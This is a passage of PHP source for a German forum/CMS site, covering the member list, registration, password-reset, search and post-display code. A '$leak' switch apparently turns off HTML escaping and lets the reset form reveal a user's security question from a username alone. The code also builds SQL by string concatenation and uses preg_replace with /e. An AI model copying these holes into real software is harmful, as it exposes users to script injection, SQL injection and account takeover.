.(($status/2%2 or isset($_COOKIE['debug']) and $_COOKIE['debug']) ? " <input type='button' value='Strip HTML' onClick='document.profile.profil.value=document.profile.profil.value.replace(/(?:^\s+|\s*<(\w+).*?>(.*?<\/\\1>\s*)?|\s+\$)/g,\"\"),document.profile.onsubmit=false' />" : "")
.
"</fieldset></form>";

# Mitglieder
if($request == 'Mitglieder' and (!$lone or $user or $uid)) {
$data = (($id and $status/2%2) ? "" : "\n\twhere u.status is not null");
$num = $sql['sq']($conn,"select count(*) from [user] as u$data");
if(
$page[0] == '')
$page = array(1,"page=1");
preg_replace($paging[5],$paging[6],"$num,$max,<a href='$self/Mitglieder?page=#key##max#".(($sort) ? "&amp;sort=$sort" : "")."' title='#var#'>#key#</a>");
if(
$rows = $sql['aq']($conn,"
select u.username as username,
u.[create],
u.change,
f.count as count,
m.bcount as blogs,
m.count as mails,
d.count as files,
u.status/4%2||','||ifnull(u.chat,'-'),
u.status/2%2,
u.status%2,
u.page as page,
u.forename as fore,
u.lastname as last,
u.ip as ip,
u.id as id,
u.chat as chat,
u.mail as mail,
u.status as status,
u.useragent as agent,
u.tagline as tagline,
p.id as profil,
s.id as script,
strftime('%d.%m.%Y %H:%M',u.[create]) as angemeldet,
strftime('%d.%m.%Y %H:%M',u.change) as aktion,
f.userid as userid,
m.mid as mailid,
m.rcount as rcount,
d.pcount as pcount,
t.tcount as tcount,
c.username as chatuser
from [user] as u
left join ( select userid,
count(*) as count
from [forum]
where status"
.(($status%4 == 0) ? "%2 = 0" : " is not null")." and mailid is null
group by userid) as f
on f.userid = u.id
left join ( select u.id as mid,
count(f.id)-count(b.id) as count,
count(b.id) as bcount,
count(m.id)-count(r.id) as rcount
from [user] as u
left join [forum] as f on f.userid = u.id or f.mailid = u.id
left join [forum] as r on r.id = f.id and r.mailid = u.id and r.status/2%2 = 1
left join [forum] as m on m.id = f.id and m.mailid = u.id
left join [forum] as b on b.id = f.id and b.mailid = u.id and b.mailid = b.userid and b.status"
.(($status%4 == 0) ? "%2 = 0" : " is not null")."
where f.status is not null and f.mailid is not null
group by u.id) as m
on m.mid = u.id
left join ( select a.user,
count(*) as count,
count(p.id) as pcount
from [file] as a
left join [file] as p on p.id = a.id and p.status/2%2 = 0
where a.status is not null
group by a.user) as d
on d.user = u.id
left join ( select userid,
count(*) as tcount
from [forum] as t
where path is null and mailid is null and t.status is not null
group by userid) as t
on t.userid = u.id
left join [user] as p on p.id = u.id and p.profil is not null
left join [user] as s on s.id = p.id and s.profil like '%<script%>%</script>%'
left join [user] as c on c.id = u.chat"
.$data.preg_replace($sorth[2],$sorth[3],"u.username;13;u.username")."
limit
$val,$max")) {
$row = array();
foreach(
$rows as $var)
$row[] = "<tr><td".(($leak and $status/2%2 and $var['script']) ? " bgcolor='#ffe0e0'" : "").">"
.(((is_null($var['profil']) or $var['profil'] == '') and !$status/2%2) ? "<span title='Kein Profil hinterlegt'>$var[username]</span>"
: "<a href='$self/Profil/$var[username]' title='Profil anzeigen'>".((is_null($var['profil']) or $var['profil'] == '' or !$status/2%2)
?
$var['username'] : "<b>$var[username]</b>")."</a>")."</td><td nowrap>$var[angemeldet]</td><td nowrap>$var[aktion]</td><td align='center'>"
.((intval($var['count'])) ? (($var['tcount']) ? "<span title='Neue Threads'>$var[tcount]</span>/" : "")."<a href='$self?id=$var[id]' title='Gesamtbeiträge'>$var[count]</a>" : "-")."</td><td align='center'>".(($var['blogs']) ? "<a href='$self/Blog/$var[username]'>$var[blogs]</a>" : '-')."</td><td align='center'>"
.(($status/2%2) ? ((intval($var['mails'])) ? "<a href='$self/Mail?id=$var[id]'>"
.(($var['rcount'] > 0) ? "<span title='Ungelesen'>$var[rcount]</span>/" : "")."<span title='Im Postfach'>$var[mails]</span></a>" : "-")."</td><td align='center'>"
.((intval($var['files'])) ? ((intval($var['pcount'])) ? "<a href='$self?s=d&amp;id=$var[id]' title='Nur Öffendliche Dateien'>$var[pcount]</a>/" : '')."<a href='$self/Datei/$var[username]' title='Alle Dateien'>$var[files]</a>" : "-")."</td><td align='center'>" : '').(($status%2) ? (($var['status']/4%2 and is_null($var['chat']))
?
"Frei" : (($var['chat']) ? (($status/2%2) ? "<a href='$self/Profil/$var[chatuser]' title='Im Chat mit $var[chatuser]'>Chat</a>" : "Chat") : "-"))
.((
$var['status']/8%2 and ($var['chat'] or $var['status']/4%2)) ? "&nbsp;<span title='Verschlüsselt'>$lock</span>" : '')."</td><td align='center'>" : "")
.((
$var['status']/2%2) ? 'Admin' : ((is_null($var['status'])) ? '-' : 'Benutzer'))
.
"</td><td align='center' nowrap>".(($var['status']%2) ? (($status/2%2) ? "<a href='$self/Abmelden?id=$var[id]' title='Abmelden'>Log in</a>" : "Log in") : "Log off")
.
"</td><td align='center'".(($leak and $status/2%2 and preg_match("!<(\w+)[^>]*>.*</\\1>!i",$var['tagline'])) ? " bgcolor='#ffe0e0'" : "").">".(($uid or $gast) ? "<a href='$self/Beitrag?mail=$var[id]' title='".strtr(preg_replace('/\t+.*$/','',$var['tagline']),$html)."'>Mail</a> " : (($var['page']) ? "" : "-")).(($var['page'] == '') ? "" : "<a href='".preg_replace('/^(?!https?:\/\/)/','http://',$var['page'])."'$tgb>www</a> ")
.((
$status/2%2) ? "</td><td><a href='mailto:".rawurlencode("$var[fore] $var[last] <$var[mail]>")."' title='eMail'>$var[fore] $var[last]</a></td><td title='$var[agent]'>$var[ip]" : '')
.
"</td></tr>";
$out .= "<fieldset><legend><b>Mitglieder</b></legend><table border='1'><tr>".preg_replace($sorth[0],$sorth[1],"Benutzername=1\tErstanmeldung=2\tLetzte&nbsp;Aktion=3\tBeiträge=4\tBlogs=5\t(Mails=6)\t(Dateien=7)\t{Chat=8}\tRechte=9\tStatus=10\tKontakt=11\t(Vor-=12&nbsp;/&nbsp;Nachname=13\tIP-Adresse=14)")."</tr>".implode("",$row)."</table><h4 align='center'>$code</h4></fieldset>";
}
}

# Anmelde Formular
if(preg_match('/^(Dat|Anmeld)en$/',$request) and ($uid or $user) and $rw) {
if(
$uid) {
$array = reset(($sql['aq']($conn,"select * from [user] where id=".(($status/2%2 and isset($_REQUEST['id']) and preg_match('/\d+/',$_REQUEST['id'],$var)) ? $var[0] : $uid),SQLITE_ASSOC)));
if(
$status/2%2)
$array['userpass'] = $array['password'];
elseif(
$array['password'] == '')
$post['userpass'] = '';
unset(
$array['password']);
if(
preg_match('/^(\d+)-(?:(.+):)?(.+)$/',$array['passhelp'],$var)) {
if(!
$post['question'] = $var[1])
$post['myquestion'] = $var[2];
$post['answer'] = $var[3];
}
foreach(
$array as $key => $var)
if(!isset(
$post[$key]) or strtolower($post[$key]) == strtolower($var))
$post[$key] = $var;
}

$out .= '<table align="'.((!$uid and $register) ? "right" : "center").'"><tr><td><form name="register" action="'.$self.'/'.$request.'" method="post"><fieldset><legend><b>Persönliche Daten</b></legend>
<small>Bitte geben Sie Ihre Daten ein'
.((!$uid) ? ', um einen Benutzeraccount zu erstellen' : '').':<br />(Alle Felder mit einen * sind Pflichfelder!)</small>
<table><tr><td valign="top">'
.(($status/2%2) ? '<input type="hidden" name="id" value="'.$post['id'].'" />' : '').'
'
.preg_replace($formcheck[0],$formcheck[1],(($uid and $status/2%2 == 0) ? '<input type="hidden" name="username" value="'.$post['username'].'" />' : '{username|*Benutzername:|20|64}<br />')
.((
$uid and $status/2%2 == 0) ? '{userpass|*Altes Kennwort:|*20|64}<br />' : '<input type="hidden" name="userpass" value="'.((isset($post['userpass'])) ? $post['userpass'] : '').'" />').'{password,probate|*Kennwort:|*20|64}<br />{probate,password|*Kennwort wiederholen:|*20|64}</td>
<td valign="top">{forename|*Vorname:|20|64}<br />{lastname|*Nachname:|20|64}<br />{mail|*eMail:|20|255}<br /></td>
<td valign="top"><small>Geburtstag: <font size="1">(TT.MM.JJJJ)</font></small><br /><input type="text" size="20" maxlength="10" name="born" value="'
.((isset($post['born'])) ? preg_replace('/(\d{4})-(\d{2})-(\d{2})/','$3.$2.$1',$post['born']) : '').'" /><br />{town|Wohnort:|20|64}<br />{page|Homepage:|20|255}<br /></td></tr>
<tr><td colspan="2"><small>Persönliche Frage: (Benötigt für Kennwort Vergessen)</small><br />
<select size="1" name="question" style="width:100%'
.(($leak) ? '"' : ((isset($post['myquestion']) and $post['myquestion'] != '') ? ";display:none" : "").'" onchange="'.preg_replace($js,'',"
if(this.value == '-') {
this.style.display = 'none';
this.selectedIndex = '0';
var x = document.getElementsByName('myquestion')[0];
x.style.display = 'block';
x.focus();
}"
).'"').'>'.implode("\n",preg_replace('/.+/e','"<option value=\'".((isset($x)) ? ($x++)+1 : $x=0)."\'".((isset($post[\'question\']) and $post[\'question\'] == $x) ? " selected" : "").">$0</option>"',$pass))
.((
$leak) ? ((isset($post['myquestion']) and $post['myquestion'] != '') ? "<option value='0' selected>$post[myquestion]</option>" : "")."</select><input type='hidden' name='myquestion' value='".((isset($post['myquestion'])) ? $post['myquestion'] : '')."' />" : "<option value='-'>Eigene Frage stellen...</option></select>")
.((
$leak) ? "" : "<input type='text' style='width:100%".((isset($post['myquestion']) and $post['myquestion'] != '') ? "" : ";display:none")."' name='myquestion' size='40' maxlength='96' value='".((isset($post['myquestion']) and $post['myquestion'] != '') ? $post['myquestion'] : "")."' onblur='".preg_replace($js,'','
if(this.value == "") {
this.style.display = "none";
var x = document.getElementsByName("question")[0];
x.style.display = "block";
x.focus();
}'
)."'>").'</td><td>{answer|Persönliche Antwort:|20|96}</td></tr>
<tr><td colspan="3" align="center"><input type="hidden" name="info" value="" /><input type="submit" name="'
.(($uid) ? 'change" value="Ändern' : 'register" value="Anmelden').'" /> <input type="submit" name="stop" value="Abbrechen" />
'
.(($uid or $status/2%2) ? '<input type="submit" name="kill" value="Mitgliedschaft beenden" onclick="return confirm(\'Wirklich Löschen?\')" />' : "")).'
</td></tr></table></fieldset></form></td></tr></table><script type="text/javascript">'
."<!--\n".preg_replace($js,'','
x = document.register,
x.info.value = screen.width + "," + screen.height + "," + screen.colorDepth;
((x.username.type == "text") ? x.username : (x.userpass.value == "") ? x.userpass : x.password).focus();'
).'//--></script>';
if(
$request == "Anmelden" and $register)
$out .= "<div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),strtr($sql['sq']($conn,"
select content
from cms
where name like '
$register'
limit 1"
),array_slice($html,1)))."</div>";
}

# Kennwort Vergessen Formular
if($request == 'Kennwort' and !$uid and $rw)
$out .= '<table align="center"><tr><td><form name="password" action="'.$self.'/'.$request.'" method="post"><fieldset><legend><b>Kennwort Vergessen</b></legend>
<small>Bitte geben Sie Ihre Daten ein, um ihr Kennwort zu löschen!<br />(Alle Felder mit einen * sind Pflichfelder!)</small>
<table><tr><td'
.preg_replace($formcheck[0],$formcheck[1],(($leak) ? ' colspan="2"' : '').'>{username|*Benutzername:|20|64|onblur=getask()'.(($leak) ? '|style=width:100%}</td></tr>' : '}<br />{mail|*eMail:|20|64|onblur=getask()}</td><td>{forename|*Vorname:|20|64}<br />{lastname|*Nachname:|20|64}</td></tr>')
.
'<tr><td colspan="2"><small>'.((isset($post) and (!isset($post['question']) or !$post['question'] and !isset($post['myquestion']))) ? '<font color="#ff0000">*Persönliche Frage:</font>' : '*Persönliche Frage:').'</small><br />
<select size="1" name="question" style="width:100%">'
.implode("\n",preg_replace('/.+/e','"<option value=\'".((isset($x)) ? ($x++)+1 : $x=0)."\'".((isset($post[\'question\']) and $post[\'question\'] == $x) ? " selected" : "").">".(($x == 0 and isset($post["myquestion"]) and $post["myquestion"]) ? "$post[myquestion]" : "$0")."</option>"',$pass)).'</select><br />
{answer|*Persönliche Antwort:|20|255|style=width:100%}<br /></td></tr>
<tr><td>{password,probate|*Neues Kennwort:|*20|64}</td><td>{probate,password|*Kennwort wiederholen:|*20|64}</td></tr>
<tr><td colspan="2"><center><input type="submit" name="restore" value="Kennwort zurücksetzen" /> <input type="submit" name="stop" value="Abbrechen" /></center></td></tr>
</table></fieldset></form></td></tr></table><script type="text/javascript">'
)."<!--\n".preg_replace($js,'',"
document.password.username.focus();
try { // Request vorbereiten
var a = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
a = new ActiveXObject('Microsoft.XMLHTTP');
}
var g,f = document.password, e = f.question, d, c = document.getElementsByTagName('option')[0].firstChild, b = c.nodeValue;
function getask() {
if(f.username.value != ''"
.(($leak) ? '' : " && f.mail.value != ''").") {
a.open('GET','
$self?ask=' + f.username.value".(($leak) ? '' : " + ':' + f.mail.value").",false); // Frage vom Benutzer anfordern
a.send('');
d = 0;
if((g = a.responseText.match(/^(\d+)-(.*)$/)))
if(g[1] > 0)
d = g[1];
else
c.replaceData(0,c.nodeValue.length,g[2]);
else
c.replaceData(0,c.nodeValue.length,b);
e.selectedIndex = d;
}
}"
).'//--></script>';

# Suchformular
if($request == 'Suche') {
$usr = $sql['aq']($conn,"
select u.id as id,
username as username,
count(a.id) as acount,
count(b.id) as bcount,
ifnull(dcount,0) as dcount,
count(f.id) as fcount,
count(m.id) as mcount,
max( ifnull(max(a.[create]),0),
ifnull(max(d.ctime),0)) as time
from ( select 0 as id, 'Unbekannt' as username
union
select id,username
from [user] as u
where status is not null) as u
left join ( select user,count(*) as dcount,[create] as ctime
from file
where status "
.(($status%4 == 0) ? '' : '<')."= 1
group by user) as d on u.id = d.user
left join forum as a on u.id = a.userid
and a.status"
.(($status%4 == 0) ? "%2 = 0" : " is not null")."
left join forum as b on a.id = b.id
and b.mailid = b.userid
left join forum as f on a.id = f.id
and f.mailid is null
left join forum as m on a.id = m.id
and m.mailid is not null
and m.mailid != m.userid
"
.(($status/2%2) ? '' : str_replace('x',(($uid) ? $uid : 0),"and (m.mailid = x or m.userid = x)"))."
group by u.id
having acount > 0 or dcount > 0
order by username"
);
$wrt = array('b' => 0, 'd' => 0, 'f' => 0, 'm' => 0);
$array = array();
$val = 0;
foreach(
$usr as $key => $var) {
$usr[$key] = "<option value='$var[id]'".((isset($_GET['id']) and $_GET['id'] == $var['id']) ? " selected" : '').">$var[username]</option>";
$array[$var['id']] = $var['id'];
if(
$val < $a = strtotime($var['time']))
$val = $a;
foreach(
array_keys($wrt) as $a) {
$array[$var['id']] .= ','.$var[$a.'count'];
if(
$var[$a.'count'])
$wrt[$a] += $var[$a.'count'];
}
}
$rows = array();
if(
$wrt['b'])
$rows[] = "<option value='b'".(($s == 'b') ? ' selected' : '').">Blog ($wrt[b])</option>";
if(
$var = $sql['sq']($conn,"select count(*) from [cms] where status/8%2".(($status/2%2) ? "" : " and status/2%4 <= ".($status/2%2 + $status%2*2))))
$rows[] = "<option value='c'".(($s == 'c') ? ' selected' : '').">CMS ($var)</option>";
if(
$wrt['d'])
$rows[] = "<option value='d'".(($s == 'd') ? ' selected' : '').">Datei ($wrt[d])</option>";
if(
$wrt['f'])
$rows[] = "<option value='f'".(($s == 'f' or !$s) ? ' selected' : '').">Forum ($wrt[f])</option>";
if(
$wrt['m'])
$rows[] = "<option value='m'".(($s == 'm') ? ' selected' : '').">Mail ($wrt[m])</option>";
$line = array();
foreach(array(
1,2,3,5,10,20,25,50,75,100) as $var)
$line[] = "<option value=',$var'".((isset($_GET['page']) and $var == $max) ? ' selected' : '').">$var</option>";
$out .= "<form name='search' action='$self' method='get'><table align='center'><tr><td><fieldset><legend><b>Suche</b></legend>
<table><tr><td width='99%'><small><a href='#' id='ash' title='Suchhilfe ein/ausblenden' onClick='"
.preg_replace($jshide[0],$jshide[1],"help;2")."'>Suchbegriff</a>:"
.((isset($_SESSION['lua']) and strtotime($_SESSION['lua']) < $val) ? " <span title='Seit: ".date('d.m.Y H:i:s',strtotime($_SESSION['lua']))."'><input type='checkbox' id='new' name='new' value='1'"
.((isset($_GET['new'])) ? " checked" : "")."><label for='new'>Neuheiten</label></span>" : "")
.((
$status/2%2) ? " <a href='#' onClick='document.search.q.value=\"-\";document.search.submit()'>Gelöschtes Suchen</a>" : "")
.
"</small><br /><input type='text' name='q' value='".strtr($q,$html)."' size='60' style='width:100%' /></td>"
.((count($rows)) ? "<td><small>Ort</small><br /><select name='s' size='1' onchange='chg(this.value)'>".implode("",$rows)."</select></td>" : "")
.((
count($usr) > 1) ? "<td><small>Benutzer</small><br /><select name='id' size='1' id='user'><option value=''".((!isset($_GET['id']) and !$id) ? " selected" : "").">Alle Benutzer</option>".implode("",$usr)."</select></td>" : "")
.
"<td><small>Max</small><br /><select size='1' name='page'><option value=','>&nbsp;</option>".implode('',$line)."</select></td></tr>
<tr><td colspan='4' align='center'><input type='submit' value='Suchen' /><div id='help' class='cr' align='left' style='display:"
.((isset($_COOKIE['hide']) and ($_COOKIE['hide']/(1<<2))%2) ? 'block' : 'none')."'>".@preg_replace(array_keys($creole),array_values($creole),"**++Suchhilfe:++**
|100%
|=Suchbegriff |=findet |=findet nicht |=Beschreibung |
|@@<<style color:green 'Anlage'>> blumen@@ |Stereo<<style color:green '__anlage__'>> |Blütenbeet |**ODER**-Suche --(//Mindestens eins muss vorkommen//)-- |
|@@**+**<<style color:green 'Haus'>> **+**<<style color:green 'baum'>>@@ |<<style color:green '__Baumhaus__'>> |<<style color:blue 'Haus'>>katze |**UND**-Suche --(//Alle müssen vorkommen//)-- |
|@@<<style color:green 'Auto'>> **-**<<style color:red 'reifen'>> **-**spur@@ |<<style color:green '__Auto__'>>matisch |<<style color:blue 'Auto'>><<style color:red '__reifen__'>> |**NICHT-ODER**-Suche --(//Keins darf vorkommen//)-- |
|@@**\"**<<style color:green 'Haus im Garten'>>**\"**@@ |<<style color:green '__Haus im Garten__'>> |Im Garten<<style color:blue haus>> |**Satz**-Suche --(//Genau wie vorgegeben//)-- |
|@@<<style color:green 'wein'>>**~***<<style color:green 'glass'>>@@ |<<style color:green '__Wein__'>>trauben<<style color:green '__glass__'>> |Glass <<style color:blue Wein>> |**Platzhalter** @@**~***@@--(//Für alles oder nichts//)-- |
|@@<<style color:green 'Rollt'>>**?**<<style color:green 'r'>>@@ |<<style color:green '__Rollt__'>>o<<style color:green '__r__''>> |<<style color:blue 'Rollt'>>reppe |**Platzhalter ?** --(//Für **EIN** Zeichen//)-- |"
)."</div></td></tr></table></fieldset></td></tr></table></form><script type='text/javascript'><!--\n".preg_replace($js,'',"
function chg(x) {
if((y = document.getElementById('user'))) {
z = y.getElementsByTagName('option');
e = a.indexOf(x);
for(d=1;d<z.length;d++) {
f = c[z[d].value].split(',');
z[d].firstChild.replaceData(0,z[d].firstChild.data.length,z[d].firstChild.data.replace(/\s.*/,'') + ' ' + '(' + f[e] + ')');
if(parseInt(f[e],10) > 0) {
z[d].style.display = 'block';
z[d].disabled = false;
}
else {
z[d].style.display = 'none';
z[d].disabled = true;
}
}
if(x == 'c') {
y.setAttribute('disabled',1);
y.selectedIndex = 0;
}
else
y.removeAttribute('disabled');
}
}
var a = 'c"
.implode('',array_keys($wrt))."',
b = '"
.implode(':',$array)."'.split(':'),
c = [],
d,e,f,x,y,z;
for(x=0;x<b.length;x++) {
y = b[x].match(/^(\d+),.*$/);
c[y[1]] = y[0];
}
chg(document.search.s.value);
document.getElementById('ash').setAttribute('href','#');
document.search.q.focus();
"
)."//--></script>";
}

# Forum Beiträge mit Smilies & paging anzeigen
if(preg_match('/^(Blog|Mail|Forum)?$/',$request) or ($out == '' or substr($out,-21) == '//login//--></script>')
and !(isset(
$_REQUEST['request']) and $_REQUEST['request'] == 'Impressum' or $request == 'Impressum')) {
$wrt = array(); // Schablone für Suchanfrage als SQL-WHERE-Query
if(preg_match_all('/([-+]?)(".+?(?<!\\\\)"|\'.+?(?<!\\\\)\'|\S+)/',$q,$val)) {
foreach(
$val[1] as $key => $var) {
$key = preg_replace(array('/^([\'"])(.+)\1$/','/\\\\(?=[\'"])|\*+(?=\*)|^\*+|\*+$/'),array('$2',''),$val[2][$key]);
$val[3][$var][] = "  like '%".$sql['es'](strtr($key,array('%' => '%%', '_' => '__', '*' => '%', '?' => '_')))."%'";
if(
$var != '-' and $key)
$wrt[] = strtr(preg_quote($key,'/'),array('\\?' => '.', '\\*' => '.*?'));
}
foreach(
$val[3] as $key => $var)
$val[3][$key] = (($key == '-') ? "not " : "")."(".implode((($key == '+') ? ' and ' : ' or '),$var).")";
$val = implode(' and ',$val[3]);
}
else
$val = "  like '%".$sql['es']($q)."%'";
if(!
$request and preg_match('/^[cd]$/',$s)) { // CMS oder Datei
$usr = array((($s == 'c')
? ((
$status/2%2) ? "" : "c.status/2%4 <= ".($status/2%2 + $status%2*2)." and ").(($q == '-' and $status/2%2) ? "c.status is null" : str_replace(' ',"c.name||ifnull(c.description,'')||c.content",$val))
:
"(".(($status/2%2) ? "a.status is".(($q == '-') ? "" : " not")." null" : "a.status%2 = 1".(($uid) ? " or a.status = 0 or a.user = $uid and a.status is not null" : "")).")".(($id !== false) ? " and a.user=$id" : "").(($status/2%2 and $q == '-') ? ""
: " and a.status/2%2 = 0 and (".str_replace(' ',"a.name||ifnull(a.info,'')",$val)." or ".str_replace(' ',"a.type like 'text/%' and b64d(ifnull(a.data,''))",$val).")")),((isset($_GET['id'])) ? $_GET['id'] : $id));
$new = (isset($_GET['new']) and isset($_SESSION['lua'])) ? " and ".(($s == 'd') ? 'a.' : '')."[create] > datetime('$_SESSION[lua]')" : '';
$num = $sql['sq']($conn,"select count(*) from ".(($s == 'c') ? "[cms] as c where c.status/8%2 and" : "[file] as a where")." $usr[0]$new");
if(
$q)
$q = array(0,$q,$wrt);
}
else {
// Mail oder Blog
$mail = " where f.mailid ";
if((
$request == 'Mail' or $s == 'm') and $uid) {
$var = ($status/2%2 and $id) ? $id : $uid;
$mail .= "= $var and f.mailid != f.userid ".(($q == '-') ? '' : "and f.status/2%2 = 0 or (f.mailid = $var or f.userid = $var and f.mailid is not null) and f.mailid != f.userid ");
}
elseif(
$request == 'Blog' or $s == 'b') { // Blog
$mail .= "= f.userid".(($q == '-') ? '' : " and f.status is not null");
$var = false;
if(
$mid)
$var = $mid;
elseif(
$id)
$var = $id;
// elseif(!$s) $var = $uid;
if($var)
$mail .= " and f.userid = $var";
}
else
// Mail
$mail .= "is null";
if(
$status%4 == 0)
$mail .= " and f.status%2 = 0";
$usr = (isset($_GET['id']) and ($request != false or count($_POST) == 0) and preg_match('/^\d+$/',$_GET['id'],$var)) ? array(" and (f.userid = $var[0] or f.mailid = $var[0])",$var[0],(($var[0]) ? $sql['sq']($conn,"select username from [user] where id=$var[0]") : null)) : array('');
if(
$q != '') { // Suchanfrage zu SQL-Where-Query finalisieren
if($q == '-')
$v = " and f.status is null";
elseif(
preg_match('/^\d+$/',$q))
$v = " and (f.id = $q or f.path like '%/$q/%')";
else
$v = " and ".str_replace(' ',"ifnull(f.title,'')||f.message",$val);
$q = array($v,$q,$wrt);
}
if(!
is_array($q))
$q = array('');
if(!isset(
$_GET['q']) and !isset($_GET['b']) and "$usr[0]$q[0]" == "")
$q[0] = ' and f.path is null';
elseif(
"$usr[0]$q[0]" == "")
$q[1] = "";
$new = (isset($_GET['new']) and isset($_SESSION['lua'])) ? " and f.[create] > datetime('$_SESSION[lua]')" : '';
$num = $sql['sq']($conn,"
select count(*)
from [forum] as f
left join [user] as u on f.userid = u.id "
.(($status/2%2 and isset($q[1]) and $q[1] == "-") ? '' : " and f.status is not null and u.status is not null")."
$mail$usr[0]$q[0]$new");
}
preg_replace($paging[5],$paging[6],"$num,$max,<a href='$self".(($request != '') ? "/$request" : '')."?page=#key##max#".((count($usr) > 1) ? "&amp;id=$usr[1]" :'').(($sort) ? "&amp;sort=$sort" : "").((count($q) > 1) ? "&amp;q=".urlencode($q[1]) : '')."' title='#var#'>#key#</a>");
if(!
$page[0])
$val = max(0,$num-$max);
$rows = array();
if(
$s == 'c') { // CMS
$line = $sql['aq']($conn,"
select c.id as id,
c.[create] as 'create',
c.change as change,
c.status as '.status',
ifnull(c.status/2%4,'-1') as right,
ifnull(nullif(c.name,''),'Startseite') as name,
c.description as title,
ifnull(d.content,c.content) as '.content',
(select username from user where status/2%2 = 1) as 'from',
'cms' as type
from [cms] as c
left join [cms] as d on d.name like c.content
where c.status/8%2 and
$usr[0]$new
order by c.id
limit
$val,$max");
foreach(
$line as $var) {
$creolevar = array_merge($creolevar,$var);
$val = array(min((($val[0]) ? $val[0] : $var['id']),$var['id']),max($val[1],$var['id']));
$rows[] = "<fieldset><legend>(".(($status/2%2 or $status%4 == 1 and $var['.status']/2%4 == 2) ? "<a href='$self/CMS?id=$var[id]'>$var[id]</a>" : $var['id']).") <a href='$self/$var[name]'>$var[name]</a>"
.(($var['title']) ? " <small class='cr'>(".@preg_replace(array_keys($creole),array_values($creole),(($leak) ? $var['title'] : strtr($var['title'],array_slice($html,1)))).")</small>" : "")
.
"</legend><div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),(($leak) ? $var['.content'] : strtr($var['.content'],array_slice($html,1))))."</div></fieldset>";
}
$var = array('Seite','Seiten','Seiten');
$usr = array();
}
elseif(
$s == 'd') { // File
$line = $sql['aq']($conn,"
select a.id as id,
ifnull(a.user,0) as user,
a.name as name,
a.info as info,
ifnull(a.size,b.size) as size,
ifnull(a.type,b.type) as type,
ifnull(u.id,0) as uid,
u.status as ustat,
u.username as username
from [file] as a
left join [file] as b on a.link = b.id
left join [user] as u on a.user = u.id
where
$usr[0]$new
order by a.id
limit
$val,$max");
$a = 0;
foreach(
$line as $var) {
$val